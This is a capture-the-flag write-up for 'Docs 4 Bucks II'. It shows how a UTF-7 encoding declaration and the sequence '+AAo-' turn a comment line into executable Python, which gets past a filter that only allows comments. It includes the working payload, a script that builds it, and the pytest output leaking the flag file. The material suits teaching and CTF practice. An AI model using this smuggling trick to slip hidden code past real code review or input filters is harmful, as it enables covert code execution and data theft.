misc
1, I got Meta after the competition tho
Docs 4 Bucks II
You know the gist from our old challenge.
You document our code, we give you $$$!!!!
nc 0.cloud.chals.io 18965
tldr;
Result: one “comment” line becomes executable Python without violating the filter.
solve
We are given a Python module flag_checker.py and told we may only “document” it: add lines that start with # containing ASCII printable characters; any edit or non-comment line is rejected. The service then executes the file with pytest. We bypass the restriction by adding an encoding declaration (# coding: utf-7) and, on the next comment line, embedding the UTF–7 sequence +AAo- (newline).
After decoding, that sequence turns the remainder of the line into a real code line which we use to raise an exception that prints the flag from resources/flag.txt.
❯ nc 0.cloud.chals.io 18965
_______ __ __ _______ __
| \ | \ | \ | \ | \
| $$$$$$$\ ______ _______ _______ | $$ | $$ | $$$$$$$\ __ __ _______ | $$ __ _______
| $$ | $$ / \ / \ / \ | $$__| $$ | $$__/ $$| \ | \ / \| $$ / \ / \\
| $$ | $$| $$$$$$\| $$$$$$$| $$$$$$$ | $$ $$ | $$ $$| $$ | $$| $$$$$$$| $$_/ $$| $$$$$$$\
| $$ | $$| $$ | $$| $$ \$$ \ \$$$$$$$$ | $$$$$$$\| $$ | $$| $$ | $$ $$ \$$ \
| $$__/ $$| $$__/ $$| $$_____ _\$$$$$$\ | $$ | $$__/ $$| $$__/ $$| $$_____ | $$$$$$\ _\$$$$$$\\
| $$ $$ \$$ $$ \$$ \| $$ | $$ | $$ $$ \$$ $$ \$$ \| $$ \$$\| $$
\$$$$$$$ \$$$$$$ \$$$$$$$ \$$$$$$$ \$$ \$$$$$$$ \$$$$$$ \$$$$$$$ \$$ \$$ \$$$$$$$
Welcome to Docs 4 Bucks -- You document our code, we give you $$$!!!!
RULES:
1. Don't delete or change any existing line of code!
2. You may only add documentation (lines starting with '#' containing ascii printable characters).
3. Hacking is futile, we have world-class protection in place.
Your job is to document our flag_checker.py (base64):
aW1wb3J0IG9zCgpjbGFzcyBGbGFnQ2hlY2tlcjoKICAgIGRlZiBfX2luaXRfXyhzZWxmLCBwYXRoX3RvX2ZsYWc6IHN0cik6CiAgICAgICAgc2VsZi5wYXRoX3RvX2ZsYWcgPSBwYXRoX3RvX2ZsYWcKCiAgICBkZWYgY2hlY2soc2VsZikgLT4gYm9vbDoKICAgICAgICB0cnk6CiAgICAgICAgICAgIHdpdGggb3BlbihzZWxmLnBhdGhfdG9fZmxhZywgJ3InKSBhcyBmOgogICAgICAgICAgICAgICAgZmxhZyA9IGYucmVhZCgpCiAgICAgICAgZXhjZXB0IChGaWxlTm90Rm91bmRFcnJvciwgSU9FcnJvcik6CiAgICAgICAgICAgIHJldHVybiBGYWxzZQogICAgICAgIHJldHVybiBmbGFnLnN0YXJ0c3dpdGgoIkZvcnRJRHsiKSBhbmQgZmxhZy5lbmRzd2l0aCgifVxuIikKCgpkZWYgdGVzdF9mbGFnKCk6CiAgICBmbGFnX3BhdGggPSBvcy5wYXRoLmpvaW4ob3MucGF0aC5kaXJuYW1lKF9fZmlsZV9fKSwgJ3Jlc291cmNlcycsICdmbGFnLnR4dCcpCiAgICBjaGVja2VyID0gRmxhZ0NoZWNrZXIoZmxhZ19wYXRoKQogICAgYXNzZXJ0IGNoZWNrZXIuY2hlY2soKQoKCmRlZiB0ZXN0X2ludmFsaWQodG1wX3BhdGgpOgogICAgYmFkX2ZsYWcgPSB0bXBfcGF0aCAvICJiYWRfZmxhZy50eHQiCiAgICBiYWRfZmxhZy53cml0ZV90ZXh0KCJOT1RfQV9GTEFHXG4iKQogICAgY2hlY2tlciA9IEZsYWdDaGVja2VyKHN0cihiYWRfZmxhZykpCiAgICBhc3NlcnQgbm90IGNoZWNrZXIuY2hlY2soKQoKCmlmIF9fbmFtZV9fID09ICdfX21haW5fXyc6CiAgICBpbXBvcnQgcHl0ZXN0CiAgICBpbXBvcnQgc3lzCiAgICBzeXMuZXhpdChweXRlc3QubWFpbihbX19maWxlX19dKSkK
Submit documented version of the code (base64):
IyBjb2Rpbmc6IHV0Zi03CiMgK0FBby1yYWlzZSBBc3NlcnRpb25FcnJvcihfX2ltcG9ydF9fKCdwYXRobGliJykuUGF0aChfX2ZpbGVfXykud2l0aF9uYW1lKCdyZXNvdXJjZXMnKS5qb2lucGF0aCgnZmxhZy50eHQnKS5yZWFkX3RleHQoKSkKaW1wb3J0IG9zCgpjbGFzcyBGbGFnQ2hlY2tlcjoKICAgIGRlZiBfX2luaXRfXyhzZWxmLCBwYXRoX3RvX2ZsYWc6IHN0cik6CiAgICAgICAgc2VsZi5wYXRoX3RvX2ZsYWcgPSBwYXRoX3RvX2ZsYWcKCiAgICBkZWYgY2hlY2soc2VsZikgLT4gYm9vbDoKICAgICAgICB0cnk6CiAgICAgICAgICAgIHdpdGggb3BlbihzZWxmLnBhdGhfdG9fZmxhZywgJ3InKSBhcyBmOgogICAgICAgICAgICAgICAgZmxhZyA9IGYucmVhZCgpCiAgICAgICAgZXhjZXB0IChGaWxlTm90Rm91bmRFcnJvciwgSU9FcnJvcik6CiAgICAgICAgICAgIHJldHVybiBGYWxzZQogICAgICAgIHJldHVybiBmbGFnLnN0YXJ0c3dpdGgoIkZvcnRJRHsiKSBhbmQgZmxhZy5lbmRzd2l0aCgifVxuIikKCgpkZWYgdGVzdF9mbGFnKCk6CiAgICBmbGFnX3BhdGggPSBvcy5wYXRoLmpvaW4ob3MucGF0aC5kaXJuYW1lKF9fZmlsZV9fKSwgJ3Jlc291cmNlcycsICdmbGFnLnR4dCcpCiAgICBjaGVja2VyID0gRmxhZ0NoZWNrZXIoZmxhZ19wYXRoKQogICAgYXNzZXJ0IGNoZWNrZXIuY2hlY2soKQoKCmRlZiB0ZXN0X2ludmFsaWQodG1wX3BhdGgpOgogICAgYmFkX2ZsYWcgPSB0bXBfcGF0aCAvICJiYWRfZmxhZy50eHQiCiAgICBiYWRfZmxhZy53cml0ZV90ZXh0KCJOT1RfQV9GTEFHXG4iKQogICAgY2hlY2tlciA9IEZsYWdDaGVja2VyKHN0cihiYWRfZmxhZykpCiAgICBhc3NlcnQgbm90IGNoZWNrZXIuY2hlY2soKQoKCmlmIF9fbmFtZV9fID09ICdfX21haW5fXyc6CiAgICBpbXBvcnQgcHl0ZXN0CiAgICBpbXBvcnQgc3lzCiAgICBzeXMuZXhpdChweXRlc3QubWFpbihbX19maWxlX19dKSkK
Thank you for your contribution, we'll run the test suite just to be safe...
==================================== ERRORS ====================================
_______________________ ERROR collecting flag_checker.py _______________________
flag_checker.py:3: in <module>
raise AssertionError(__import__('pathlib').Path(__file__).with_name('resources').joinpath('flag.txt').read_text())
E AssertionError: FortID{Y0u_Add3d_S0m3_C0mm3n75_4nD_G07_Th3_Fl4g_:0}
=========================== short test summary info ============================
ERROR flag_checker.py - AssertionError: FortID{Y0u_Add3d_S0m3_C0mm3n75_4nD_G0...
!!!!!!!!!!!!!!!!!!!! Interrupted: 1 error during collection !!!!!!!!!!!!!!!!!!!!
1 error in 0.13sorig = r"""import os
class FlagChecker:
def __init__(self, path_to_flag: str):
self.path_to_flag = path_to_flag
def check(self) -> bool:
try:
with open(self.path_to_flag, 'r') as f:
flag = f.read()
except (FileNotFoundError, IOError):
return False
return flag.startswith("FortID{") and flag.endswith("}\n")
def test_flag():
flag_path = os.path.join(os.path.dirname(__file__), 'resources', 'flag.txt')
checker = FlagChecker(flag_path)
assert checker.check()
def test_invalid(tmp_path):
bad_flag = tmp_path / "bad_flag.txt"
bad_flag.write_text("NOT_A_FLAG\n")
checker = FlagChecker(str(bad_flag))
assert not checker.check()
if __name__ == '__main__':
import pytest
import sys
sys.exit(pytest.main([__file__]))
"""
preamble = "# coding: utf-7\n# +AAo-raise AssertionError(__import__('pathlib').Path(__file__).with_name('resources').joinpath('flag.txt').read_text())\n"
payload = preamble + orig
import base64
print(base64.b64encode(payload.encode('utf-8')).decode())FortID{Y0u_Add3d_S0m3_C0mm3n75_4nD_G07_Th3_Fl4g_:0}
Last updated